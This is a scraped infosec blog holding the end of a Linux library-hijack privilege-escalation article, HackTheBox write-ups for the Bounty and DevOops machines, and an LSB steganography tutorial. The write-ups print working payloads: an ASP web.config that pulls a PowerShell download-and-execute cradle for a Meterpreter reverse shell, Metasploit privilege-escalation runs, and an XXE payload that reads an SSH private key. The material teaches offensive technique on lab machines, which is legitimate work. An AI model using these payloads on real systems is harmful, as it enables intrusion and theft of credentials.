	libcustom.so => /tmp/libcustom.so (0xb77bb000)		# Now pointing to /tmp/libcustom.so
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7605000)
	/lib/ld-linux.so.2 (0xb77c9000)

Now we execute the application…

LAB-Blog:~$ /usr/bin/myexec
Welcome to my amazing application!
I'm the bad library

…And the exploit works just fine!

Alternative to /etc/ld.so.conf

What I just showed you is working, but actually, there’s even simpler. The configuration file including /tmp is not mandatory since we have the setuid bit set on ldconfig. Indeed, ldconfig -f allows us to use a different configuration file from the existing /etc/ld.so.conf.

What we have to do is pretty simple, follow the example.

We create our fake ld.so.conf:

LAB-Blog:/tmp$ echo "include /tmp/conf/*" > fake.ld.so.conf

Then, we add a configuration file to the location indicated by fake.ld.so.conf:

LAB-Blog:/tmp$ echo "/tmp" > conf/evil.conf

Finally, we execute ldconfig with the -f option:

LAB-Blog:/tmp$ ldconfig -f fake.ld.so.conf

And we enjoy the result:

LAB-Blog:/tmp$ ldd /usr/bin/myexec
	linux-gate.so.1 =>  (0xb7761000)
	libcustom.so => /tmp/libcustom.so (0xb7754000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759e000)
	/lib/ld-linux.so.2 (0xb7762000)
LAB-Blog:/tmp$ /usr/bin/myexec
Welcome to my amazing application!
I'm the bad library

Even more straight-forward! :smile:

How can we defend against this?

As a general principle, DO NOT set the setuid bit on a program if you don’t asbolutely control every aspect of its execution, a lot of them can be used in a way that allows privilege escalations.

Another fundamental aspect that shouldn’t be left behind is the management of user permissions. As we’ve seen earlier, allowing a user to write inside /usr/lib can lead to severe security issues. If you’re a system administrator, ensure that low-privileged users can’t write to:

/usr/lib and /lib
Locations specified by /etc/ld.so.conf
If LD_LIBRARY_PATH is set by default on your system, the user shouldn’t be able to write at the location specified by this variable.

More generally, ensure that every action performed by users are executed with the lowest privileges.

BoiteAKlou :hammer:

HackTheBox: Bounty writeup - Metasploit basics

2018-10-28T21:00:00+00:00

Hack The Box is an online platform that allows you to test your pentesting skills on virtual machines intentionally left vulnerable. It is a great place to learn and the community is very helpful so I warmly recommend you to check this site out.

This machine was pretty easy so I’m going to take this opportunity to explain you the basics of the Metasploit framework.

Metasploit Introduction
Initial Foothold
- Port scanning
- Web Application mapping
User Access
- Meterpreter Shell
Privilege Escalation
- Local Exploit Suggester
- ms10_092_schelevator
Final Words

Metasploit Introduction

Metasploit is an open-source pentesting framework distributed by Rapid7. It is extremly powerful and easy to use once you understand the logic.

You can use it for generating a bunch of payloads for every system or languages with msfvenom. It can also be run as an interactive console for connecting to the target system and exploiting it without leaving the console.

Metasploit relies on modules, which are specifically designed to exploit vulnerabilities. Each module has a list of options that you have to set in order to adapt the exploit to your specific environment. Then, you type “exploit” and Metasploit does the job for you.

This tool is extremely powerful when you want to exploit something quickly but it is not the best approach in a learning process because everything is done hunder the hood and you don’t really know what happens on the system. To be used with caution… :wink:

Initial Foothold

Back to our Bounty machine, we will perform the usual steps of information gathering.

Port scanning

First, run a nmap scan with default scripts and version detection enabled. We will run a deeper scan if nothing is found.

# Nmap 7.70 scan initiated Sun Oct 21 13:58:33 2018 as: nmap -sC -sV -oA nmap/bounty 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.039s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 21 13:58:45 2018 -- 1 IP address (1 host up) scanned in 12.07 seconds

A single open port doesn’t seem like much so we will run a deeper scan in background while we start investigating this website.

We can notice that the webserver runs on IIS 7.5, which is completely outdated since the last version is 10.0.

Web Application mapping

A good practice for saving time is to start running a directory listing tool such as dirbuster or gobuster before playing with the website’s features manually. I prefer using gobuster since it’s a bit faster.

kali:~/Bounty/dirb$ gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -o gobuster/bounty

The scan will take a few minutes so we will check the results later.

Let’s see what this website looks like…

A wonderful merlin drawing! It might be an hint.

The source code doesn’t reveal anything more… Hopefully gobuster will fly to our rescue!

kali:~/Bounty$ cat gobuster/bounty
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)

The /uploadedfiles/ directory seems very interesting but access is denied. However, an educated guess could tell that there should be an upload page somewhere…

We also know that the server is running on IIS so file extensions should be asp or aspx. We can refine our search by adding -x .aspx to gobuster, based on the assumptions we just made.

kali:~/Bounty$ gobuster -u http://10.10.10.93/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .aspx -o gobuster/bounty.aspx

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.93/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2018/10/27 22:43:30 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)

Running it only a few seconds is enough to reveal transfer.aspx.

We found our entry point. Let’s exploit it!

User Access

Googling “IIS 7.5 upload RCE” teaches us that ASP code can be executed by uploading a file called web.config.

We will test if the website is vulnerable by uploading the following file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>

The ASP code is located at the very bottom of the file, between <% and %>. With this payload, the server should return “3” if it is vulnerable.

Our file uploaded successfully so it means this file extension is allowed. We will suppose that files are not renamed during the upload so we will try to access it at /uploadedfiles/web.config.

It works! :fireworks: Now we should be able to execute commands on the web server.

Meterpreter Shell

A reverse shell is generally what we are looking for when it comes to RCE. This time we will do better!

Metasploit can generate specific payloads but also setup a listener that will wait for the return of our reverse shell. But why would we do that? Because it offers the possibility to execute metasploit exploit modules directly inside our remote session. We can also juggle between several sessions, which can be pretty useful in some cases.

Here is the list of steps we will follow:

Generate our meterpreter shell payload.
Incorporate the payload into the web.config file.
Upload the web.config file.
Access the uploaded file in order to trigger the payload.
See what happens…

Meterpreter Shell Payload

First, we have to run Metasploit console with msfconsole. Then, we will use the web delivery script exploit module. A module is loaded with the keyword “use”, followed by the path of the module.

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) >

Then, you can type “options” to list all available parameters for this module:

msf exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python

We will now specify several parameters in order to adapt the payload to our environment.

msf exploit(multi/script/web_delivery) > set SRVHOST 10.10.13.75  # Ip address of our machine
SRVHOST => 10.10.13.75
msf exploit(multi/script/web_delivery) > set TARGET 2  # TARGET 2 = powershell payload
TARGET => 2
msf exploit(multi/script/web_delivery) > set PAYLOAD windows/x64/meterpreter/reverse_tcp  # The payload we want to inject, a reverse shell
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 10.10.13.75  # IP address for the reverse shell
LHOST => 10.10.13.75
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
msf exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.10.13.75:4444
[*] Using URL: http://10.10.13.75:8080/moceswFJvKmkeD8
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.10.13.75:8080/moceswFJvKmkeD8');

Here is our payload! We must now integrate it into the web.config file. Do not close the msfconsole or hit CTR+C because Metasploit is currently listening and waiting for the payload to return.

Payload Incorporation

As you may have noticed, the payload is a powershell script (remember set TARGET 2) and not an ASP script. However, we can call system functions in ASP so we will call cmd.exe and pass our payload as an argument.

This will result in the following web.config file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
on error resume next
Dim oS,output
Set oS = Server.CreateObject("WSCRIPT.SHELL")
output = oS.exec("cmd.exe > /c powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://10.10.13.75:8080/G783OPiDR3Em');").stdout.readall
Response.write("Powershell: " & vbCrLf & output & vbCrLf & vbCrLf)
%>

Upload web.config and access it

Now we have to upload our web.config file and visit the URL http://10.10.10.93/uploadedfiles/web.config to trigger the payload.

Back to msfconsole

We should see the following inside msfconsole:

[*] 10.10.10.93      web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.13.75:4444 -> 10.10.10.93:49158) at 2018-10-28 19:23:06 +0100

A session has been opened on the remote target. We can list every opened sessions with sessions -l

msf exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  BOUNTY\merlin @ BOUNTY  10.10.13.75:4444 -> 10.10.10.93:49158 (10.10.10.93)

As you can see, we are currently connected as merlin on the BOUNTY machine.

Gimme this user.txt

It’s now time to retrieve the user flag.

Inside msfconsole, we can move into the session number 1 with sessions -i 1 and we should arrive in a meterpreter shell.

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

From here, we can use a few shell commands (the full list can be displayed by typing help or ?) or type shell and dive into the classical Windows command prompt.

I suggest you to play around with the available commands from meterpreter and to get familiar with it.

The following command will give you the user flag:

meterpreter > cat C:/Users/merlin/Desktop/user.txt
e29ad8[...]2f44a2f

Privilege Escalation

The privilege escalation was very straight-forward for this box, especially with meterpreter.

We will use a great module for lazy people, which is called: local_exploit_suggester.

Local Exploit Suggester

Back in our metepreter session, we can call this module with the following command:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 10 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.

So many options! :smiling_imp:

Let’s try the first one…

ms10_092_schelevator

We can background our current meterpreter session thanks to the command background so we go back to msfconsole.

Then, we can tell Metasploit to use exploit/windows/local/ms10_092_schelevator

msf exploit(multi/script/web_delivery) > use exploit/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION                    yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008

We specify the session number to run this module on and the payload we want along with the local port to listen on for the reverse shell.

We can’t use the same port as our previous reverse shell or no session will be created.

msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1   # The session number of our reverse shell (sessions -l to display them)
SESSION => 1
msf exploit(windows/local/ms10_092_schelevator) > set PAYLOAD windows/x64/meterpreter/reverse_tcp   # If the exploit works, we want a new reverse shell
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ms10_092_schelevator) > set LPORT 4445  # The local port to listen on
LPORT => 4445
msf exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.13.75  # Ip address of our machine
LHOST => 10.10.13.75

Then, we can launch the exploit:

msf exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.13.75:4445
[*] Preparing payload at C:\Windows\TEMP\FIydYyMVXS.exe
[*] Creating task: sMVszFGn5xTj
[*] SUCCESS: The scheduled task "sMVszFGn5xTj" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\sMVszFGn5xTj...
[*] Original CRC32: 0xa1c992cd
[*] Final CRC32: 0xa1c992cd
[*] Writing our modified content back...
[*] Validating task: sMVszFGn5xTj
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status         
[*] ======================================== ====================== ===============
[*] sMVszFGn5xTj                             11/1/2018 9:14:00 PM   Ready          
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "sMVszFGn5xTj" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "sMVszFGn5xTj" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (206403 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "sMVszFGn5xTj".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.13.75:4445 -> 10.10.10.93:49162) at 2018-10-28 20:14:13 +0100
[*] SUCCESS: The scheduled task "sMVszFGn5xTj" was successfully deleted.
[*] SCHELEVATOR

meterpreter >

The getuid command will confirm that the exploit worked:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We can now retrieve the root flag the same way we did for the user:

meterpreter > cat C:/Users/Administrator/Desktop/root.txt
c837f7b[...]f9d4f5ea

Et voilà!

Final Words

I hope it gave you a brief overview of the power of Metasploit Framework and its ease of use. However, keep in mind that this tool will not help you to understand what is really happening on the machine.

Do not hesitate to ask your questions if something remains unclear for you :relaxed:.

BoiteAKlou :hammer:

HackTheBox: DevOops writeup

2018-10-10T08:00:00+00:00

In this article, I’ll detail every step I’ve gone through in order to root the DevOops box, from the reconnaissance phase to the privilege escalation.

Recon
- Port scanning
Web Application Mapping
From XXE to User access
Getting root
- Enumeration
- Sensitive git repository

Recon

The only information we get when starting a new box is the IP address of the machine. With experience, you’ll develop your own reconnaissance routine but I think that all of them start with the good old nmap port scanning.

Port scanning

Nmap is a very powerful tool offering a lot of features and options that can be a bit tricky to use for beginners. First, we will perform a fast scan of TCP open ports with OS and services version detection.

kali:/DevOops$ nmap -A -v 10.10.10.91
    22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
    |   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
    |_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
    5000/tcp open  http    Gunicorn 19.7.1
    | http-methods:
    |_  Supported Methods: HEAD OPTIONS GET
    |_http-server-header: gunicorn/19.7.1
    |_http-title: Site doesn't have a title (text/html; charset=utf-8).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

In a future article dedicated to reconnaissance, I’ll show more Nmap commands that can be very useful in other contexts.

The scan output reveals ssh on port 22 and an http server listening on the non-standard port 5000. We also have service versions to keep in mind for an eventual exploit.

Let’s investigate this Web application and come back to if we hit a deadend.

Web Application Mapping

First, reach this URL (http://10.10.10.91:5000) with a web browser.

The page doesn’t show any link or dynamic content so let’s run dirb in order to discover valid URLs. Dirb is a web content scanner which bruteforces directories and files names on web servers.

kali:/DevOops$ dirb http://10.10.10.91:5000

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 11 23:16:57 2018
URL_BASE: http://10.10.10.91:5000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.91:5000/ ----
+ http://10.10.10.91:5000/feed (CODE:200|SIZE:546263)                                                                                               
+ http://10.10.10.91:5000/upload (CODE:200|SIZE:347)                                                                                                

-----------------
END_TIME: Thu Oct 11 23:22:22 2018
DOWNLOADED: 4612 - FOUND: 2

Good news! Upload features are generally poorly secured inside web applications. Let’s visit this page!

From XXE to User access

Xml eXternal Entities is an exploit based on weakly configured XML parsers that allow arbitrary file reading on the webserver.

Since this web application wants us to upload XML files, it seemed natural to me to test this vulnerability.

I used the following payload:

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<Book>
    <Author>BoiteAKlou</Author>
    <Subject>&example;</Subject>
    <Content>Payload</Content>
</Book>

And here is the output from the server:

PROCESSED BLOGPOST: Author: BoiteAKlou Subject: Doe Content: Payload URL for later reference: /uploads/test2.xml File path: /home/roosa/deploy/src

We see that the Subject has been replaced by Doe so the server is vulnerable.

At this point, we can retrieve a bunch of interesting files or get roosa’s private ssh key and then login via ssh.

Here’s the payload I used:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa" >]>
<Book>
    <Author>BoiteAKlou</Author>
    <Subject>Payload</Subject>
    <Content>&xxe;</Content>
</Book>

Once the private key retrieved, we can connect via ssh and enjoy the user flag:

kali:/DevOops$ ssh -i id_rsa [email protected]
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Thu Oct 11 17:27:36 2018 from 10.10.12.226
roosa@gitter:~$ cat user.txt
c5808e[..]ecc67b

Now things are getting serious…

Getting root

Enumeration

Every privilege escalation requires an exhaustive enumeration of the system. This is quite a long process which can be facilitated by scripts such as LinEnum.

I won’t detail here my whole process of enumerating, only the relevant part in our case.

The TODO note we found when consulting the website suggested that this project was versioned. In that case, it could be interesting to retrieve the content of a git or svn folder.

You can use the following command to look for any .git directory:

roosa@gitter:~$ find . -type d -name .git 2>/dev/null
./work/blogfeed/.git

Great we found one! Let’s see what we can learn from it…

Sensitive git repository

git log shows us every commit message from this repository and the two commits below caught my attention:

commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <[email protected]>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key

commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson <[email protected]>
Date:   Mon Mar 19 09:32:03 2018 -0400

    add key for feed integration from tnerprise backend

I immediately jumped back to the commit where the key was accidentaly added, thanks to this command:

roosa@gitter:~/work/blogfeed$ git checkout d387abf63e05c9628a59195cec9311751bdb283f
error: Your local changes to the following files would be overwritten by checkout:
	run-gunicorn.sh
Please, commit your changes or stash them before you can switch branches.
Aborting

Crap! We have unstaged changes. No problem, we can tell git to ignore these changes with git checkout -- run-gunicorn.sh and then re-execute it.

roosa@gitter:~/work/blogfeed$ git checkout d387abf63e05c9628a59195cec9311751bdb283f
Note: checking out 'd387abf63e05c9628a59195cec9311751bdb283f'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at d387abf... add key for feed integration from tnerprise backend

Better! The file authcredentials.key has appeared inside resources/integration/. Let’s try to login as root using this key:

roosa@gitter:~/work/blogfeed$ ssh -i resources/integration/authcredentials.key root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'resources/integration/authcredentials.key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "resources/integration/authcredentials.key": bad permissions
root@localhost's password:

SSH refuses to use this key because permissions are too open. We can fix this with chmod 0600 resources/integration/authcredentials.key and try to connect again.

roosa@gitter:~/work/blogfeed$ ssh -i resources/integration/authcredentials.key root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Oct 12 04:48:17 2018 from 10.10.13.23
root@gitter:~#

Bingo! Enjoy the flag :wink:

BoiteAKlou :hammer:

Steganography Tutorial: Least Significant Bit (LSB)

2018-08-12T16:00:00+00:00

This article details a common steganography method known as the Least Significant Bit. This technique is very efficient because of its simplicity and its ability to be undetectable to the naked eye. After reading this, you’ll be able to hide a message inside a picture using this technique, but also to detect any dissimulated message.

Do It Yourself!
Technical description
Detection
- All about contrast
Extraction
- Python my love
Your Turn!
- Resources

Do It Yourself!

If you’re already familiar with the concept of LSB and simply want to practice, download this picture and feel free to send me your result or to post it in the comment section.

Technical description

Digital image structure

To understand this technique, a few reminders of some digital imaging basics might be useful.

A digital image is composed of $X$ rows by $Y$ columns.
The point of coordinates $[a,b]$ with $0\leqslant a<X$ and $0\leqslant b<Y$, is called a pixel. The pixel represents the smallest addressable element of a picture.
Each pixel is associated with a color, usually decomposed in three primary colors: Red, Green, Blue. A pixel can then be specified as pixel(Red, Green, Blue), that’s what we call the RGB model.
Red, Green and Blue intensities can vary from 0 to 255.
WHITE = (255,255,255) and BLACK = (0,0,0).
A pixel take 3 bytes of memory, 1 for each primary component (hence the maximum value of 255).
A byte consists of 8 bits, representing a binary number (example: 1010 0101).
The highest value a byte can take is 1111 1111, which is equal to 255 in decimal.

LSB Principle

Now that you have the structure of a digital image in mind, we can start talking about the serious stuff :wink:.

As its name suggests, the Least Significant Bit technique is based on hiding information in the least significant bit of each byte of the picture. There are multiple variants of LSB but, in this article, we will set the focus on the most common one.

Am I not significant to you?

The notion of “Least Significant Bit” probably doesn’t speak to everyone so I’ll explain it. Let’s take the following representation of a byte, where the weight is annotated below each bit:

The first bit on the left is the “heaviest” one since it’s the one that has the biggest influence on the value of the byte. Its weight is 128.

Now look at the bit on the very right. Its weight is 1 and it has a very minor impact on the value of the byte. In a way, this bit is the least significant bit of this byte.

Why do we modify this very specific bit?

Well, simply because it’s the least significant one. Let me explain:

The following diagram illustrates the color difference when the least significant bit of the red channel is modified.

Can you spot the difference? No? Me neither and that’s exactly the goal! That way, we can modify 3 bits per pixel without it is noticeable.

How to hide a message?

Ok the theory should be clear now, but we’ve seen that we can only hide 3 bits per pixel and we want to dissimulate a full message! How are we supposed to do?

Easy! A message is actually a sequence of bits so it’s not an issue. The only limitation is that the size of the message in bits must be inferior to the number of pixels in the picture multiplied by 3.

There are plenty of tools already available for hiding a message inside a picture with the LSB technique but I encourage you to write your own tool. This will help you getting familiar with a scripting language and will require from you a prefect understanding of the concept.

For the needs, of this tutorial I used Python 2.7. Sources of the scripts used in this article will be downloadable at the bottom of the page.

Alright, let’s dive into the code! :+1:

Encoding and transforming a string into a sequence of bits

In order to avoid data losses caused by encoding problems, the initial message must be base64-encoded. There are many ways to turn a string into its binary representation in python, but I decided to use the bitarray module. If you don’t have it installed, just type sudo pip install bitarray.

import bitarray
import base64

message = 'YourVerySecretText'
encoded_message = base64.b64encode(message)
#Converts the message into an array of bits
ba = bitarray.bitarray()
ba.frombytes(encoded_message.encode('utf-8'))
bit_array = [int(i) for i in ba]

bit_array now contains the binary representation of our message.

NOTE: Make sure to hide your message inside a PNG file and not a JPEG or its lossy compression algorithm will overwrite your modifications!

Messing with pixels

Let’s say we want to hide our message inside this picture (download with Right click > Save Image as…):

There’s a wonderful python library for manipulating images called PIL (pillow since python3).

First, let’s duplicate the original picture. We will only modify the one called “lsb_spongebob.png”. Then, we store the image size for later. The load() function retrieves an array containing every pixel in RGB format.

from PIL import Image

im = Image.open("spongebob.png")
im.save("lsb_spongebob.png")

im = Image.open("lsb_spongebob.png")
width, height = im.size
pixels = im.load()

Let’s say we want to hide our message at the beginning of the first row of the picture, I’ve written the following piece of code which is kinda ulgy, I agree, but that makes the job, you know :wink:.

i = 0
for x in range(0,width):
    r,g,b = pixels[x,0]
    print("[+] Pixel : [%d,%d]"%(x,0))
    print("[+] \tBefore : (%d,%d,%d)"%(r,g,b))
    #Default values in case no bit has to be modified
    new_bit_red_pixel = 255
    new_bit_green_pixel = 255
    new_bit_blue_pixel = 255

    if i<len(bit_array):
        #Red pixel
        r_bit = bin(r)
        r_last_bit = int(r_bit[-1])
        r_new_last_bit = r_last_bit & bit_array[i]
        new_bit_red_pixel = int(r_bit[:-1]+str(r_new_last_bit),2)
        i += 1

    if i<len(bit_array):
        #Green pixel
        g_bit = bin(g)
        g_last_bit = int(g_bit[-1])
        g_new_last_bit = g_last_bit & bit_array[i]
        new_bit_green_pixel = int(g_bit[:-1]+str(g_new_last_bit),2)
        i += 1

    if i<len(bit_array):
        #Blue pixel
        b_bit = bin(b)
        b_last_bit = int(b_bit[-1])
        b_new_last_bit = b_last_bit & bit_array[i]
        new_bit_blue_pixel = int(b_bit[:-1]+str(b_new_last_bit),2)
        i += 1

    pixels[x,0] = (new_bit_red_pixel,new_bit_green_pixel,new_bit_blue_pixel)
    print("[+] \tAfter: (%d,%d,%d)"%(new_bit_red_pixel,new_bit_green_pixel,new_bit_blue_pixel))

im.save('lsb_spongebob.png')

What this script does is actually pretty simple. For each color channel of each pixel of the first row, the script extracts the least significant bit and replaces it by the result of the logical operation & between the current least significant bit and the bit stored at index [i] in bit_array. Once the message is fully written, remaining pixels on the row are replaced by white pixels(255,255,255).

I’ve also added some debugging outputs which are useful in order to illustrate the changes that are being made.

This script only works for hiding short messages in the first row of the picture. It’s not optimized at all so you’ll probably write a better one but you get the idea.

Detection

If everything went well, our message is now hidden inside “lsb_spongebob.png”. We will now study one specific method allowing us to detect such steganography techniques. There are many others which have a more mathematical approach but, since it’s not my speciality, I won’t mention them here.

All about contrast

The technique I’ll present you is very manual. It consists in playing with brightness and contrast parameters in your favorite (GNU) Image Manipulation Program, in order to spot certain irregularities. Nothing better than a concrete example. I personally use GIMP for this purpose.

Let’s open “lsb_spongebob.png” with GIMP and open the Brightness-Contrast box under Colors menu.
Set brightness to its minimum value and contrast to its maximum value.
Zoom in and scan for irregularities.
On the top left, you should see something like that:

That’s really suspicious because every pixel should be white in this area.

This technique is not 100% reliable but pretty straight-forward and simple.

Once we’ve located the suspected hidden message, we can proceed to the extraction.

Extraction

We’ve detected LSB steganography inside a picture! But how can we recover the message? Simple! We have to extract the LSBs from each pixel and then assemble the result as a string.

Once again, I recommand you to write your own script because it’s the only way to make sure everything is clear in your mind. In case you encounter difficulties, you can always take inspiration from mine.

Python my love

We know that the secret is hidden in the first row, so it’s useless to iterate over the whole picture with our script.

#coding: utf-8
import base64
from PIL import Image

image = Image.open("lsb_spongebob.png")

extracted = ''

pixels = image.load()
# Iterate over pixels of the first row
for x in range(0,image.width):
    r,g,b = pixels[x,0]
    # Store LSB of each color channel of each pixel
    extracted += bin(r)[-1]
    extracted += bin(g)[-1]
    extracted += bin(b)[-1]

chars = []
for i in range(len(extracted)/8):
    byte = extracted[i*8:(i+1)*8]
    chars.append(chr(int(''.join([str(bit) for bit in byte]), 2)))

# Don't forget that the message was base64-encoded
flag = base64.b64decode(''.join(chars))
print flag

Your Turn!

To make this tutorial a bit funnier, I’ve slightly modified lsb_spongebob.png and I’ve hidden a different message inside. Will you be able to recover it? :wink:

Maybe this one isn’t exactly in the same place… :smiling_imp:

Feel free to send me your result or to post it in the comment section! Good luck!

Resources

BoiteAKlou :hammer:

BoiteAKlou’s Infosec Blog

CyBRICS CTF Writeups

Table of Contents

[Web] Warmup

Statement

Resolution

[Web] Bitkoff Bank

Statement

Resolution

[Web] Caesaref

Statement

Resolution

[Network] Sender

Statement

Resolution

[Network] Paranoid

Statement

Resolution

[Misc] ProCTF

Statement

Resolution

[Stegano] Honey, Help!

Statement

Resolution

INS’HACK CTF Writeups

Table of Contents

[Web] Exploring the universe

Statement

Resolution

[Web] Almost Tchap

Statement

Resolution

[Programming] HackCode-01/02

Statement

Example

Strategy

Part 01

Part 02

